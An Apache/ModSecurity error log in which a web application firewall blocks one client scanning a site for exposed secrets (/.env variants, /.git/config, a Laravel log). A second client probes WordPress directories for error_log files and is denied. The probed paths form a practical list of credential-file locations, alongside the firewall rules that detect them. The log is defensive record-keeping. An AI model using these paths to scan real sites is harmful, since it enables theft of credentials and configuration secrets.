[Mon May 11 17:34:28.626657 2026] [security2:error] [pid 1424905:tid 1424916] [client 185.213.174.48:52242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxQAAAUg"]
[Mon May 11 17:34:28.626799 2026] [security2:error] [pid 1411055:tid 1411065] [client 185.213.174.48:52188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agH3BEWKUxpmnkK7zHyWIgAAAQg"]
[Mon May 11 17:34:28.626938 2026] [security2:error] [pid 1424905:tid 1424919] [client 185.213.174.48:52134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuwgAAAUs"]
[Mon May 11 17:34:28.626989 2026] [security2:error] [pid 1411055:tid 1411065] [client 185.213.174.48:52188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agH3BEWKUxpmnkK7zHyWIgAAAQg"]
[Mon May 11 17:34:28.626369 2026] [security2:error] [pid 1416109:tid 1416144] [client 185.213.174.48:52062] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agH3BFV4kyjgo4bQBUhtsgAAAM4"]
[Mon May 11 17:34:28.627567 2026] [security2:error] [pid 1411201:tid 1411268] [client 185.213.174.48:52216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtgAAAJc"]
[Mon May 11 17:34:28.627670 2026] [security2:error] [pid 1411201:tid 1411266] [client 185.213.174.48:52192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.staging"] [unique_id "agH3BPy_GXSWIKeli0sMswAAAJU"]
[Mon May 11 17:34:28.627726 2026] [security2:error] [pid 1411055:tid 1411059] [client 185.213.174.48:52138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agH3BEWKUxpmnkK7zHyWIwAAAQI"]
[Mon May 11 17:34:28.627843 2026] [security2:error] [pid 1416109:tid 1416144] [client 185.213.174.48:52062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agH3BFV4kyjgo4bQBUhtsgAAAM4"]
[Mon May 11 17:34:28.627860 2026] [security2:error] [pid 1424905:tid 1424916] [client 185.213.174.48:52242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxQAAAUg"]
[Mon May 11 17:34:28.627745 2026] [security2:error] [pid 1412074:tid 1412077] [client 185.213.174.48:52198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.test"] [unique_id "agH3BDJnyuKVXoStDhbNuwAAAEE"]
[Mon May 11 17:34:28.628368 2026] [security2:error] [pid 1412074:tid 1412077] [client 185.213.174.48:52198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.test"] [unique_id "agH3BDJnyuKVXoStDhbNuwAAAEE"]
[Mon May 11 17:34:28.628652 2026] [security2:error] [pid 1424905:tid 1424921] [client 185.213.174.48:52230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/admin/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuxAAAAU0"]
[Mon May 11 17:34:28.628703 2026] [security2:error] [pid 1411055:tid 1411065] [client 185.213.174.48:52188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agH3BEWKUxpmnkK7zHyWIgAAAQg"]
[Mon May 11 17:34:28.628790 2026] [security2:error] [pid 1411201:tid 1411256] [client 185.213.174.48:52088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agH3BPy_GXSWIKeli0sMtAAAAIo"]
[Mon May 11 17:34:28.629005 2026] [security2:error] [pid 1416109:tid 1416144] [client 185.213.174.48:52062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/config"] [unique_id "agH3BFV4kyjgo4bQBUhtsgAAAM4"]
[Mon May 11 17:34:28.629060 2026] [security2:error] [pid 1411099:tid 1411114] [client 185.213.174.48:52174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agH3BA-Qm4vhlWBPlMjR5wAAAA4"]
[Mon May 11 17:34:28.629344 2026] [security2:error] [pid 1411099:tid 1411114] [client 185.213.174.48:52174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agH3BA-Qm4vhlWBPlMjR5wAAAA4"]
[Mon May 11 17:34:28.629635 2026] [security2:error] [pid 1411201:tid 1411268] [client 185.213.174.48:52216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtgAAAJc"]
[Mon May 11 17:34:28.629563 2026] [security2:error] [pid 1412074:tid 1412097] [client 185.213.174.48:52162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agH3BDJnyuKVXoStDhbNuAAAAFU"]
[Mon May 11 17:34:28.629441 2026] [security2:error] [pid 1416109:tid 1416129] [client 185.213.174.48:52146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agH3BFV4kyjgo4bQBUhttAAAAMA"]
[Mon May 11 17:34:28.630002 2026] [security2:error] [pid 1411201:tid 1411256] [client 185.213.174.48:52088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agH3BPy_GXSWIKeli0sMtAAAAIo"]
[Mon May 11 17:34:28.630055 2026] [security2:error] [pid 1412074:tid 1412097] [client 185.213.174.48:52162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agH3BDJnyuKVXoStDhbNuAAAAFU"]
[Mon May 11 17:34:28.630080 2026] [security2:error] [pid 1424905:tid 1424919] [client 185.213.174.48:52134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agH3BIW8yzYoWG_eyCWuwgAAAUs"]
[Mon May 11 17:34:28.629274 2026] [security2:error] [pid 1416109:tid 1416142] [client 185.213.174.48:52246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agH3BFV4kyjgo4bQBUhtswAAAMw"]
[Mon May 11 17:34:28.630131 2026] [security2:error] [pid 1416109:tid 1416129] [client 185.213.174.48:52146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agH3BFV4kyjgo4bQBUhttAAAAMA"]
[Mon May 11 17:34:28.630437 2026] [security2:error] [pid 1412074:tid 1412077] [client 185.213.174.48:52198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.test"] [unique_id "agH3BDJnyuKVXoStDhbNuwAAAEE"]
[Mon May 11 17:34:28.630651 2026] [security2:error] [pid 1416109:tid 1416142] [client 185.213.174.48:52246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agH3BFV4kyjgo4bQBUhtswAAAMw"]
[Mon May 11 17:34:28.630845 2026] [security2:error] [pid 1411099:tid 1411114] [client 185.213.174.48:52174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agH3BA-Qm4vhlWBPlMjR5wAAAA4"]
[Mon May 11 17:34:28.632188 2026] [security2:error] [pid 1416109:tid 1416129] [client 185.213.174.48:52146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agH3BFV4kyjgo4bQBUhttAAAAMA"]
[Mon May 11 17:34:28.632713 2026] [security2:error] [pid 1416109:tid 1416142] [client 185.213.174.48:52246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agH3BFV4kyjgo4bQBUhtswAAAMw"]
[Mon May 11 17:34:28.632790 2026] [security2:error] [pid 1411055:tid 1411066] [client 185.213.174.48:52280] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agH3BEWKUxpmnkK7zHyWJQAAAQk"]
[Mon May 11 17:34:28.632839 2026] [security2:error] [pid 1411201:tid 1411424] [client 185.213.174.48:52258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/public/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtwAAAJM"]
[Mon May 11 17:34:28.632959 2026] [security2:error] [pid 1411055:tid 1411066] [client 185.213.174.48:52280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agH3BEWKUxpmnkK7zHyWJQAAAQk"]
[Mon May 11 17:34:28.633272 2026] [security2:error] [pid 1411201:tid 1411424] [client 185.213.174.48:52258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/public/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtwAAAJM"]
[Mon May 11 17:34:28.633654 2026] [security2:error] [pid 1411055:tid 1411066] [client 185.213.174.48:52280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agH3BEWKUxpmnkK7zHyWJQAAAQk"]
[Mon May 11 17:34:28.634083 2026] [security2:error] [pid 1411201:tid 1411424] [client 185.213.174.48:52258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/public/.env"] [unique_id "agH3BPy_GXSWIKeli0sMtwAAAJM"]
[Mon May 11 17:34:28.634467 2026] [security2:error] [pid 1412074:tid 1412097] [client 185.213.174.48:52162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agH3BDJnyuKVXoStDhbNuAAAAFU"]
[Mon May 11 17:34:43.348273 2026] [authz_core:error] [pid 1411201:tid 1411269] [client 176.120.22.46:60877] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/rest-api/error_log, referer: http://www.labaujue.com/wp-includes/rest-api/
[Mon May 11 17:34:49.704656 2026] [authz_core:error] [pid 1411201:tid 1411247] [client 176.120.22.46:49466] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/rest-api/endpoints/error_log, referer: http://www.labaujue.com/wp-includes/rest-api/endpoints/
[Mon May 11 17:34:55.970887 2026] [authz_core:error] [pid 1411099:tid 1411109] [client 176.120.22.46:54912] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/rest-api/fields/error_log, referer: http://www.labaujue.com/wp-includes/rest-api/fields/
[Mon May 11 17:35:02.207624 2026] [authz_core:error] [pid 1412074:tid 1412087] [client 176.120.22.46:60307] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/rest-api/search/error_log, referer: http://www.labaujue.com/wp-includes/rest-api/search/
[Mon May 11 17:35:14.877364 2026] [authz_core:error] [pid 1411201:tid 1411424] [client 176.120.22.46:54320] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sitemaps/providers/error_log, referer: http://www.labaujue.com/wp-includes/sitemaps/providers/
[Mon May 11 17:35:27.364423 2026] [authz_core:error] [pid 1424905:tid 1424924] [client 176.120.22.46:64219] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/lib/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/lib/
[Mon May 11 17:35:33.346258 2026] [ssl:error] [pid 1411099:tid 1411111] (EAI 2)Name or service not known: [client 216.157.40.92:15736] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:33.346939 2026] [ssl:error] [pid 1411099:tid 1411111] AH01941: stapling_renew_response: responder error
[Mon May 11 17:35:33.606044 2026] [authz_core:error] [pid 1424905:tid 1424919] [client 176.120.22.46:52696] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/namespaced/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/namespaced/
[Mon May 11 17:35:33.828325 2026] [ssl:error] [pid 1411055:tid 1411065] (EAI 2)Name or service not known: [client 216.157.40.84:37710] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:35:33.828393 2026] [ssl:error] [pid 1411055:tid 1411065] AH01941: stapling_renew_response: responder error
